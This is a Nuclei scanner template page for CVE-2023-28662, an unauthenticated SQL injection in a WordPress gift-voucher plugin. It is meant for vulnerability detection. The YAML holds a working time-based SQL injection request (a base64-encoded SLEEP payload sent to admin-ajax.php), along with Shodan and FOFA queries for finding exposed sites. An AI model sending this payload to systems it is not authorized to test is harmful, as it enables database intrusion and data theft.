Skip to content
Nuclei Templates

Wordpress Gift Cards <= 4.3.1 - SQL Injection

ID: CVE-2023-28662

Severity: critical

Author: xxcdd

Tags: time-based-sqli,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen

Description

Section titled “Description”

The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.

YAML Source

Section titled “YAML Source”
id: CVE-2023-28662


info:
  name: Wordpress Gift Cards <= 4.3.1 - SQL Injection
  author: xxcdd
  severity: critical
  description: |
    The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
  remediation: |
    Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
  reference:
    - https://www.tenable.com/security/research/tra-2023-2
    - https://wordpress.org/plugins/gift-voucher/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/JoshuaMart/JoshuaMart
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-28662
    cwe-id: CWE-89
    epss-score: 0.01065
    epss-percentile: 0.8414
    cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: codemenschen
    product: gift_vouchers
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/gift-voucher/"
    fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
  tags: time-based-sqli,cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher,codemenschen
flow: http(1) && http(2)


http:
  - raw:
      - |
        GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        internal: true
        words:
          - 'Gift Vouchers and Packages'


  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=


    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 500
          - contains(body, 'critical error')
        condition: and
# digest: 4a0a0047304502200dca6671f8a3992f56a54d1b0f9c4811a826a96d2974d033c7b398a9b8c49d7e022100e78118adc5d0055f35446568783d8b68d1ecb17a7f9a7fcbdf5d34735a6bad4d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-28662.yaml"

View on Github